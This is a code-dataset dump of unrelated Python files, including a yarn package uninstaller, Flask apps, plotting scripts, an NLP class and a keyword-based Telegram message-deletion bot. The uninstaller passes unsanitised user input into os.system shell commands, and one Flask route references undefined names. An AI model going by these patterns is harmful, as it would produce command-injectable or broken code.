"django.shortcuts.render", "line_number": 14, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 17, "usage_type": "call"}, {"api_name": "models.Book", "line_number": 17, "usage_type": "argument"}, {"api_name": "django.shortcuts.render", "line_number": 18, "usage_type": "call"}, {"api_name": "models.Auteur.objects.all", "line_number": 21, "usage_type": "call"}, {"api_name": "models.Auteur.objects", "line_number": 21, "usage_type": "attribute"}, {"api_name": "models.Auteur", "line_number": 21, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 22, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 25, "usage_type": "call"}, {"api_name": "models.Auteur", "line_number": 25, "usage_type": "argument"}, {"api_name": "django.shortcuts.render", "line_number": 26, "usage_type": "call"}, {"api_name": "models.Genre.objects.all", "line_number": 29, "usage_type": "call"}, {"api_name": "models.Genre.objects", "line_number": 29, "usage_type": "attribute"}, {"api_name": "models.Genre", "line_number": 29, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 30, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 33, "usage_type": "call"}, {"api_name": "models.Genre", "line_number": 33, "usage_type": "argument"}, {"api_name": "django.shortcuts.render", "line_number": 34, "usage_type": "call"}, {"api_name": "models.Edition.objects.all", "line_number": 37, "usage_type": "call"}, {"api_name": "models.Edition.objects", "line_number": 37, "usage_type": "attribute"}, {"api_name": "models.Edition", "line_number": 37, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 38, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 41, "usage_type": "call"}, {"api_name": "models.Edition", "line_number": 41, "usage_type": "argument"}, {"api_name": "django.shortcuts.render", "line_number": 42, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 47, "usage_type": "call"}, {"api_name": "form.UploadFileForm", "line_number": 53, "usage_type": "call"}, {"api_name": "form.is_valid", "line_number": 55, "usage_type": "call"}, {"api_name": "io.StringIO", "line_number": 59, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 63, "usage_type": "call"}, {"api_name": "models.Edition.objects.create", "line_number": 65, "usage_type": "call"}, {"api_name": "models.Edition.objects", "line_number": 65, "usage_type": "attribute"}, {"api_name": "models.Edition", "line_number": 65, "usage_type": "name"}, {"api_name": "models.Genre.objects.create", "line_number": 66, "usage_type": "call"}, {"api_name": "models.Genre.objects", "line_number": 66, "usage_type": "attribute"}, {"api_name": "models.Genre", "line_number": 66, "usage_type": "name"}, {"api_name": "models.Auteur.objects.create", "line_number": 67, "usage_type": "call"}, {"api_name": "models.Auteur.objects", "line_number": 67, "usage_type": "attribute"}, {"api_name": "models.Auteur", "line_number": 67, "usage_type": "name"}, {"api_name": "models.Book.objects.create", "line_number": 69, "usage_type": "call"}, {"api_name": "models.Book.objects", "line_number": 69, "usage_type": "attribute"}, {"api_name": "models.Book", "line_number": 69, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 76, "usage_type": "call"}, {"api_name": "form.UploadFileForm", "line_number": 78, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 79, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 49, "usage_type": "call"}, {"api_name": "form.SearchBookForm", "line_number": 87, "usage_type": "call"}, {"api_name": "form.is_valid", "line_number": 89, "usage_type": "call"}, {"api_name": "form.cleaned_data", "line_number": 90, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 93, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 98, "usage_type": "call"}, {"api_name": "form.SearchBookForm", "line_number": 101, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 102, "usage_type": "call"}]} +{"seq_id": "276041763", "text": "from plotly import express as px\n\nfig = px.scatter(\n x=lons,\n y=lats,\n labels={'x': '经度', 'y': '纬度'},\n range_x=[-200, 200],\n range_y=[-90, 90],\n width=800,\n height=800,\n title='全球地震散点图',\n)\nfig.write_html('global_earthquakes.html')\nfig.show()", "sub_path": "Python Work/Exercise/visualization project/eq_world_map.py", "file_name": "eq_world_map.py", "file_ext": "py", "file_size_in_byte": 287, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "plotly.express.scatter", "line_number": 3, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 3, "usage_type": "name"}]} +{"seq_id": "209293786", "text": "# -*- coding: utf-8 -*-\n\nfrom clint.textui import puts, colored\nfrom PyInquirer import prompt\n\n\n\"\"\" Define windows package delete function for yarn \"\"\"\n\n\ndef package_manager_yarn(global_package, containerized_package):\n import os\n import click\n import re\n\n if global_package and not containerized_package:\n puts(colored.white(\n \"The list of available globally packages to uninstall are\"))\n print(\"\")\n os.system(\n 'cd extra/files/yarn && yarn global list > packages.txt')\n\n file = open('extra/files/yarn/packages.txt',\n 'r', encoding='utf-8')\n\n content = file.readlines()\n\n for line in content:\n click.echo_via_pager(line.strip())\n\n extra_questions = [\n {\n 'name': 'package_name',\n 'type': 'input',\n 'message': 'Enter package name for uninstallation |',\n 'default': 'foo'\n },\n {\n 'name': 'confirmation',\n 'type': 'confirm',\n 'message': 'Are you sure you wanna delete this package?',\n 'default': False,\n }\n ]\n\n answers = prompt(extra_questions)\n\n package_name = answers['package_name']\n confirmation = answers['confirmation']\n\n if confirmation:\n print(\"\")\n os.system('yarn global remove {}'.format(package_name))\n puts(\n f'\\n{colored.yellow(\"Uninstalled package {}\".format(package_name))}')\n quit()\n elif not confirmation:\n puts(\n f'\\n{colored.green(\"Thank God you decided not to uninstall the package {}!\".format(package_name))}')\n quit()\n\n elif containerized_package and not global_package:\n puts('\\nUsing normal yarn package environments\\n')\n\n more_question = [\n {\n 'name': 'folder_location',\n 'type': 'input',\n 'message': 'Enter full path of folder containing project using yarn |'\n }\n ]\n\n answer = prompt(more_question)\n folder_path = answer['folder_location']\n\n if folder_path != \"\":\n drive_pattern = re.compile('[A-Z]\\\\:')\n is_a_drive = re.search(drive_pattern, folder_path)\n drive_letter = folder_path.split(':')[0]\n changed_drive = os.chdir(f'{drive_letter}:')\n main_folder = folder_path.split(':')[1]\n correct_folder = os.path.exists(f'{main_folder}/yarn.lock')\n\n if not correct_folder:\n print(\"\")\n puts(colored.red(\n 'Sorry an error occurred with verifying if folder is an actual yarn project'))\n exit()\n elif correct_folder:\n print(\"\")\n activated = os.system(\n 'cd \"{}\" && mkdir info && cd info && type nul > packages.txt && yarn list > packages.txt'.format(folder_path))\n\n with open('{}/info/packages.txt'.format(folder_path)) as package_file:\n content = package_file.readlines()\n for line in content:\n click.echo_via_pager(line)\n\n if activated == 1:\n puts(\n f\"{colored.red('Error')}: while listing dependencies in the yarn project\")\n exit()\n\n extra_questions = [\n {\n 'name': 'package_name',\n 'type': 'input',\n 'message': 'Enter package name for uninstallation |',\n 'default': 'foo'\n },\n {\n 'name': 'confirmation',\n 'type': 'confirm',\n 'message': 'Are you sure you wanna delete this package?',\n 'default': False,\n }\n ]\n\n answers = prompt(extra_questions)\n package_name = answers['package_name']\n confirmation = answers['confirmation']\n\n if confirmation:\n activated = os.system(\n 'cd \"{}\" && yarn remove {}'.format(folder_path, package_name))\n\n if activated == 0:\n puts(\n f'\\n{colored.yellow(\"Uninstalled package {}\".format(package_name))}')\n elif activated == 1:\n puts(\n f\"{colored.red('Error')}: while deleting dependencies in the yarn project\")\n quit()\n elif not confirmation:\n puts(\n f'\\n{colored.green(\"Thank God you decided not to uninstall the package {}!\".format(package_name))}')\n quit()\n\n\n\"\"\"\nIf you wanna contribute whats really needed is what is in written as a --> `TODO`\nI love folding code\n\"\"\"\n", "sub_path": "package_uninstaller/package_managers/windows/yarn.py", "file_name": "yarn.py", "file_ext": "py", "file_size_in_byte": 5024, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "clint.textui.puts", "line_number": 16, "usage_type": "call"}, {"api_name": "clint.textui.colored.white", "line_number": 16, "usage_type": "call"}, {"api_name": "clint.textui.colored", "line_number": 16, "usage_type": "name"}, {"api_name": "os.system", "line_number": 19, "usage_type": "call"}, {"api_name": "click.echo_via_pager", "line_number": 28, "usage_type": "call"}, {"api_name": "PyInquirer.prompt", "line_number": 45, "usage_type": "call"}, {"api_name": "os.system", "line_number": 52, "usage_type": "call"}, {"api_name": "clint.textui.puts", "line_number": 53, "usage_type": "call"}, {"api_name": "clint.textui.colored.yellow", "line_number": 54, "usage_type": "call"}, {"api_name": "clint.textui.colored", "line_number": 54, "usage_type": "name"}, {"api_name": "clint.textui.puts", "line_number": 57, "usage_type": "call"}, {"api_name": "clint.textui.colored.green", "line_number": 58, "usage_type": "call"}, {"api_name": "clint.textui.colored", "line_number": 58, "usage_type": "name"}, {"api_name": "clint.textui.puts", "line_number": 62, "usage_type": "call"}, {"api_name": "PyInquirer.prompt", "line_number": 72, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 76, "usage_type": "call"}, {"api_name": "re.search", "line_number": 77, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 79, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path", "line_number": 81, "usage_type": "attribute"}, {"api_name": "clint.textui.puts", "line_number": 85, "usage_type": "call"}, {"api_name": "clint.textui.colored.red", "line_number": 85, "usage_type": "call"}, {"api_name": "clint.textui.colored", "line_number": 85, "usage_type": "name"}, {"api_name": "os.system", "line_number": 90, "usage_type": "call"}, {"api_name": "click.echo_via_pager", "line_number": 96, "usage_type": "call"}, {"api_name": "clint.textui.puts", "line_number": 99, "usage_type": "call"}, {"api_name": "clint.textui.colored.red", "line_number": 100, "usage_type": "call"}, {"api_name": "clint.textui.colored", "line_number": 100, "usage_type": "name"}, {"api_name": "PyInquirer.prompt", "line_number": 118, "usage_type": "call"}, {"api_name": "os.system", "line_number": 123, "usage_type": "call"}, {"api_name": "clint.textui.puts", "line_number": 127, "usage_type": "call"}, {"api_name": "clint.textui.colored.yellow", "line_number": 128, "usage_type": "call"}, {"api_name": "clint.textui.colored", "line_number": 128, "usage_type": "name"}, {"api_name": "clint.textui.puts", "line_number": 130, "usage_type": "call"}, {"api_name": "clint.textui.colored.red", "line_number": 131, "usage_type": "call"}, {"api_name": "clint.textui.colored", "line_number": 131, "usage_type": "name"}, {"api_name": "clint.textui.puts", "line_number": 134, "usage_type": "call"}, {"api_name": "clint.textui.colored.green", "line_number": 135, "usage_type": "call"}, {"api_name": "clint.textui.colored", "line_number": 135, "usage_type": "name"}]} +{"seq_id": "387174063", "text": "from flask import Flask, render_template, request\nfrom networkx import disjoint_union\n\nfrom .graph_ops import GraphDB\n\ndef create_app():\n app = Flask(__name__)\n graph_database = GraphDB(\"data/out.txt.gz\", \"data/entity_full_names.txt\", predictions_filename=\"data/hypotheses_confidence.txt.gz\")\n\n @app.route(\"/\")\n def get_form_info():\n \"\"\"Renders the main page, and populates the menus with nodes from the database.\"\"\"\n gene_list = sorted(graph_database.get_nodes(\"gene\"))\n ab_list = sorted(graph_database.get_nodes(\"antibiotic\"))\n full_node_list = sorted(graph_database.get_nodes())\n\n return render_template(\"ecomics_index.html\", gene_list=gene_list, ab_list=ab_list, full_list=full_node_list)\n\n @app.route(\"/gene_search\", methods=[\"POST\", \"GET\"])\n def gene_search():\n \"\"\"Draws the neighborhood around a given gene\"\"\"\n\n selected_gene = request.args.get(\"gene\", default=None)\n\n if selected_gene is None:\n selected_gene = request.form[\"gene-select-box\"]\n\n gene_neighborhood_graph = graph_database.get_node_neighborhood(selected_gene, 2)\n\n gene_neighborhood_graph_cy = graph_database.get_graph_cytoscape_format(gene_neighborhood_graph)\n\n return render_template(\"ecomics_gene_search.html\", graph_data=gene_neighborhood_graph_cy, root_node=selected_gene)\n\n @app.route(\"/antibiotic_search\", methods=[\"POST\", \"GET\"])\n def antibiotic_search():\n \"\"\"Draws the neighborhood around a given antibiotic\"\"\"\n selected_ab = request.args.get(\"antibiotic\", default=None)\n\n if selected_ab is None:\n selected_ab = request.form[\"antibiotic-select-box\"]\n\n ab_neighborhood_graph = graph_database.get_node_neighborhood(selected_ab, 2)\n\n ab_neighborhood_graph_cy = graph_database.get_graph_cytoscape_format(ab_neighborhood_graph)\n\n return render_template(\"ecomics_antibiotic_search.html\", graph_data=ab_neighborhood_graph_cy, root_node=selected_ab)\n\n @app.route(\"/gene_antibiotic_path\", methods=[\"POST\"])\n def gene_antibiotic_path_search():\n \"\"\"Plots the union of thew neighborhoods of a given gene and antibiotic\"\"\"\n selected_gene = request.form[\"gene-select-box\"]\n selected_ab = request.form[\"antibiotic-select-box\"]\n\n graph_path = graph_database.get_path_between_nodes(selected_gene, selected_ab)\n\n graph_path_cy = graph_database.get_graph_cytoscape_format(graph_path)\n\n return render_template(\"ecomics_gene_antibiotic_path.html\", graph_data=graph_path_cy, root_node=selected_gene, root_node_2=selected_ab)\n\n return app\n\n\nif __name__ == \"__main__\":\n app = create_app()\n app.run()\n", "sub_path": "backendapp/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 2678, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "flask.Flask", "line_number": 7, "usage_type": "call"}, {"api_name": "graph_ops.GraphDB", "line_number": 8, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 17, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 23, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 23, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 23, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 26, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 26, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 32, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 37, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 37, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 37, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 40, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 40, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 46, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 51, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 51, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 52, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 52, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 58, "usage_type": "call"}]} +{"seq_id": "165244615", "text": "import numpy as np\nimport pickle\nfrom os import path, getcwd, makedirs\n\nimport matplotlib.pyplot as plt\nfrom plotter_params import plot_setup\nfrom matplotlib.ticker import MaxNLocator\n\nfilename = path.join('data', 'BO', 'real_machine')\nreg_Fs = []\nexp_Fs = []\nfor i in range(1, 7):\n if i == 1:\n filepath = path.join(filename, '3q_CNOT_three_applications')\n else:\n filepath = path.join(filename, f'3q_CNOT_three_applications_{i}')\n with open(path.join(filepath, 'fidels.pickle'), 'rb') as f:\n regular_true_F, seen_true_F, exp_opt_true_F = pickle.load(f)\n print(regular_true_F)\n reg_Fs.append(regular_true_F)\n exp_Fs.append(exp_opt_true_F)\n\nif not path.exists(path.join(filename, 'plots')):\n makedirs(path.join(filename, 'plots'))\n\n_s = 10\nplot_setup()\nplt.scatter([i+1 for i in range(len(reg_Fs))], reg_Fs, marker='o', label='Unoptimised', s=_s)\nplt.scatter([i+1 for i in range(len(exp_Fs))], exp_Fs, marker='^', label='Optimised', s=_s)\nplt.ylim([0., 0.8])\nplt.xlabel('Optimisation Run')\nplt.ylabel('Process Fidelity')\nplt.legend(frameon=True)\nax = plt.gca()\nax.xaxis.set_major_locator(MaxNLocator(integer=True))\nax.margins(0.01)\nplt.savefig(path.join(filename, 'plots', '70_iterations_meas_err_simplified.pdf'))\nplt.show()\n", "sub_path": "plot_3_application_CNOT_BO.py", "file_name": "plot_3_application_CNOT_BO.py", "file_ext": "py", "file_size_in_byte": 1270, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.path.join", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "name"}, {"api_name": "pickle.load", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 23, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "name"}, {"api_name": "plotter_params.plot_setup", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}, {"api_name": "matplotlib.ticker.MaxNLocator", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}]} +{"seq_id": "15991830", "text": "from flask import Flask, request, jsonify\n\nfrom flask_sqlalchemy import SQLAlchemy\nfrom os import environ\nfrom flask_cors import CORS\napp = Flask(__name__)\n\n# app.config['SQLALCHEMY_DATABASE_URI'] = environ.get('dbURL')\napp.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+mysqlconnector://root@localhost:3306/spm'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.config['SQLALCHEMY_ENGINE_OPTIONS'] = {'pool_recycle': 299}\n\ndb = SQLAlchemy(app)\nCORS(app)\n\nclass Trainer(db.Model):\n __tablename__ = 'trainer'\n\n TrainerID = db.Column(db.Integer, nullable=False, primary_key=True)\n EmployeeName = db.Column(db.String(255), nullable=False)\n CurrentDesignation = db.Column(db.String(255), nullable=False)\n Department = db.Column(db.String(255), nullable=False)\n\n def __init__(self, TrainerID, EmployeeName, CurrentDesignation, Department):\n self.TrainerID = TrainerID\n self.EmployeeName = EmployeeName\n self.CurrentDesignation = CurrentDesignation\n self.Department = Department\n\n def json(self):\n return {\"TrainerID\": self.TrainerID, \"EmployeeName\": self.EmployeeName, \n \"CurrentDesignation\": self.CurrentDesignation, \"Department\": self.Department}\n\n@app.route(\"/trainer\")\ndef get_all():\n trainerlist = Trainer.query.all()\n if len(trainerlist):\n return jsonify(\n {\n \"code\": 200,\n \"data\": {\n \"classes\": [trainer.json() for trainer in trainerlist]\n }\n }\n )\n return jsonify(\n {\n \"code\": 404,\n \"message\": \"No trainers found.\"\n }\n ), 404\n\n@app.route(\"/trainer/\")\ndef find_by_trainer(TrainerID):\n trainer = Trainer.query.filter_by(TrainerID=TrainerID).first()\n if trainer:\n return jsonify(\n {\n \"code\": 200,\n \"data\": trainer.json()\n }\n ), 200\n return jsonify(\n {\n \"code\": 404,\n \"message\": \"No trainer found.\"\n }\n ), 404\n\n# dk abt this part need edit\n@app.route(\"/user/\", methods=['POST'])\ndef create_class(classname):\n if (Classes.query.filter_by(ClassID=ClassID).first()):\n return jsonify(\n {\n \"code\": 400,\n \"data\": {\n \"email\": email\n },\n \"message\": \"Email already exists.\"\n }\n ), 400\n\n data = request.get_json()\n user = User(email, **data)\n\n try:\n db.session.add(user)\n db.session.commit()\n except:\n return jsonify(\n {\n \"code\": 500,\n \"data\": {\n \"user\": user.json()\n },\n \"message\": \"An error occurred creating the user.\"\n }\n ), 500\n\n return jsonify(\n {\n \"code\": 201,\n \"data\": user.json()\n }\n ), 201\n\nif __name__ == '__main__':\n app.run(port=5000, debug=True)", "sub_path": "spm website/docker/trainer.py", "file_name": "trainer.py", "file_ext": "py", "file_size_in_byte": 3023, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "flask.Flask", "line_number": 6, "usage_type": "call"}, {"api_name": "flask_sqlalchemy.SQLAlchemy", "line_number": 13, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 14, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 38, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 46, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 57, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 63, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 74, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 84, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 84, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 91, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 101, "usage_type": "call"}]} +{"seq_id": "150839109", "text": "import json\nimport re\nfrom collections import Counter\nfrom typing import Dict, List, Tuple\n\nimport pandas as pd\nfrom gensim import similarities\n\nfrom . import Chapter, DatabaseConnection, Paragraph, RequestHandler\nfrom .utils import _build_corpus, _build_lsi_model, nlp\n\nHOST = \"db\"\nALLOWED_METADATA = [\"title\", \"author\", \"release date\", \"last updated\", \"language\"]\n\n\nclass Document:\n def __init__(self, text: str, num_topics: int = 100):\n self._get_metadata(text)\n self.chapters = self._get_chapters(text)\n\n # build a gensim dictionary of words\n dictionary, corpus = _build_corpus(self.paragraphs)\n self.dictionary = dictionary\n self.corpus = corpus\n # build the lsi model\n self.model = _build_lsi_model(dictionary, corpus, num_topics)\n\n # connect to db\n self.db = DatabaseConnection(host=HOST)\n self.rq = RequestHandler()\n\n def _get_metadata(self, text: str) -> None:\n \"\"\" Extract relevant metadata fields\n\n \"\"\"\n metadata = re.findall(\"(.*): (.*)\\n\", text)\n for match in metadata:\n if match[0].lower() in ALLOWED_METADATA:\n setattr(self, match[0].replace(\" \", \"_\").lower(), match[1])\n\n def _get_chapters(self, text: str) -> List[Chapter]:\n \"\"\" Split prose into chapters\n\n \"\"\"\n # remove end\n prose = re.split(\"End of Project Gutenberg\", text)\n # split up chapters\n chapters = re.split(r\"chapter \\w+.?\", prose[0], flags=re.IGNORECASE)\n chapters = [Chapter(chapter) for chapter in chapters[1:]]\n return chapters\n\n @property\n def text(self) -> str:\n return \"\\n\\n\".join(c.text for c in self.chapters)\n\n @property\n def paragraphs(self) -> List[Paragraph]:\n paragraphs = [p for c in self.chapters for p in c.paragraphs]\n return paragraphs\n\n def _get_coords(self, location: str) -> Tuple[float, float, str, str]:\n \"\"\" Get coords of a specified location\n\n - check in db\n - ping openstreetmap API\n\n :param str location: location to get\n :return numeric, numeric, str, str: lon, lat, location_class, location_type\n \"\"\"\n if location in self.db.get_locations():\n lon, lat, location_class, location_type = self.db.get_location(location)[1:]\n elif location not in self.db.get_unknown_locations():\n # ping open street api\n lon, lat, location_class, location_type = self.rq.get_location_info(\n location\n )\n # add information to db\n self.db.add_location((location, lon, lat, location_class, location_type))\n else:\n raise ValueError(f\"WARNING: {location} could not be found\")\n return float(lon), float(lat), location_class, location_type\n\n def get_locations(self) -> List[Dict]:\n \"\"\" Get all locations mentioned in the document\n\n :return list(dict):\n \"\"\"\n locations = [\n (loc, para.mentions_fogg)\n for para in self.paragraphs\n for loc in para.locations\n ]\n\n location_info = []\n for loc, count in Counter(locations).items():\n try:\n lon, lat, location_class, location_type = self._get_coords(loc[0])\n except IndexError:\n self.db.add_unknown_location(loc[0])\n print(\n f\"WARNING: {loc[0]} could not be found. Added to unknown locations.\"\n )\n continue\n except ValueError as err:\n print(str(err))\n continue\n location_info.append(\n {\n \"location\": loc[0],\n \"count\": count,\n \"lon\": lon,\n \"lat\": lat,\n \"class\": location_class,\n \"type\": location_type,\n \"has_fogg\": loc[1],\n }\n )\n # remove uncommon or unwanted locations\n filter_locations = self.db.get_filter_locations()\n return [l for l in location_info if l[\"location\"] in filter_locations]\n\n def search_paragraphs(self, phrase: str) -> Tuple[str, float]:\n \"\"\" Query the document to pull out the most similar paragraph to some input text\n\n :param str phrase: Text to query paragraphs against\n \"\"\"\n phrase = [\n w.lemma_\n for w in nlp(phrase)\n if not (w.is_space or w.is_punct or w.is_digit or w.is_stop)\n ]\n print(phrase)\n # convert the query to LSI space\n vec_bow = self.dictionary.doc2bow(phrase)\n vec_lsi = self.model[vec_bow]\n # index against the corpus for comparison\n index = similarities.MatrixSimilarity(self.model[self.corpus])\n # perform a similarity query against the corpus\n sims = index[vec_lsi]\n sims = sorted(enumerate(sims), key=lambda item: -item[1])\n if sims[0][1] < 0.01:\n return \"\", 0\n else:\n return self.paragraphs[sims[0][0]].text.text, sims[0][1]\n", "sub_path": "src/document.py", "file_name": "document.py", "file_ext": "py", "file_size_in_byte": 5105, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "utils._build_corpus", "line_number": 22, "usage_type": "call"}, {"api_name": "utils._build_lsi_model", "line_number": 26, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 36, "usage_type": "call"}, {"api_name": "re.split", "line_number": 46, "usage_type": "call"}, {"api_name": "re.split", "line_number": 48, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 48, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 41, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 57, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 61, "usage_type": "name"}, {"api_name": "collections.Counter", "line_number": 95, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 83, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 83, "usage_type": "name"}, {"api_name": "utils.nlp", "line_number": 129, "usage_type": "call"}, {"api_name": "gensim.similarities.MatrixSimilarity", "line_number": 137, "usage_type": "call"}, {"api_name": "gensim.similarities", "line_number": 137, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 122, "usage_type": "name"}]} +{"seq_id": "237703153", "text": "\"\"\"\nУдаляет старые сообщения, ttl зависит от содержимого:\nобъявления живут дольше, а опасные удаляются почти сразу.\n\nКак работает:\n* При запуске читает список сохраненных сообщений\n* !save с ответом на сообщение -> сохранить\n* При запуске проверяем все старые сообщения\n* При поступлении нового сообщения ставим таймер\n\"\"\"\nimport re\nimport asyncio\nimport time\n\nfrom datetime import datetime, timezone\nfrom telethon import events, functions\nfrom .client import client\nfrom .config import channel_id, chat_id, do_forward_messages\nfrom .ban_hammer import banlist\nfrom .persistent import to_delete\n\nsecond = 1\nminute = 60 * second\nhour = 60 * minute\nday = 24 * hour\n\n\ndef get_message_ttl(text):\n text_lowercase = text.lower()\n\n # /команды\n if text.startswith('/'):\n return minute\n\n # Объявления\n sell_buy_signatures = {\n \"#объявление\",\n \"объявление\",\n \"куплю\",\n \"продам\",\n \"отдам\",\n \"продаю\",\n \"покупаю\",\n }\n if any(\n re.search(r\"\\b{}\\b\".format(signature), text_lowercase)\n for signature in sell_buy_signatures\n ):\n return 4 * day\n\n # Потенциально опасные сообщения\n danger_signatures = {\n \"бес\",\n \"алпач\",\n \"алпацкий\",\n \"бессонов\",\n \"офицер\",\n \"деж\",\n \"дежурный\",\n \"ответственный\",\n \"опер\",\n \"оперативный\",\n \"опердеж\",\n \"корпоративный\",\n \"майор\",\n \"полкан\",\n \"полковник\",\n \"майор\",\n \"майорчик\",\n \"капитан\",\n \"прапор\",\n \"прапорщик\",\n \"лейтеха\",\n \"лейтёха\",\n \"лейт\",\n \"лейтенант\",\n\t\t\"офик\",\n\t\t\"воппер\",\n\t\t\"кэп\",\n\t\t\"кэпчик\",\n\t\t\"ген\",\n\t\t\"генерал\"\n }\n if any(\n re.search(r\"\\b{}\\b\".format(signature), text_lowercase)\n for signature in danger_signatures\n ):\n return 15 * minute\n\n # По-умолчанию\n return 2 * hour\n\n\nasync def deletion_task(m):\n to_delete.add(m.id)\n ttl = get_message_ttl(m.message)\n time_passed = (datetime.now(timezone.utc) - m.date).total_seconds()\n actual_ttl = ttl - time_passed if time_passed < ttl else 0\n print(\"deleting\", m.id, \"in\", actual_ttl, \"seconds\")\n await asyncio.sleep(actual_ttl)\n if m.id in to_delete:\n await m.delete()\n 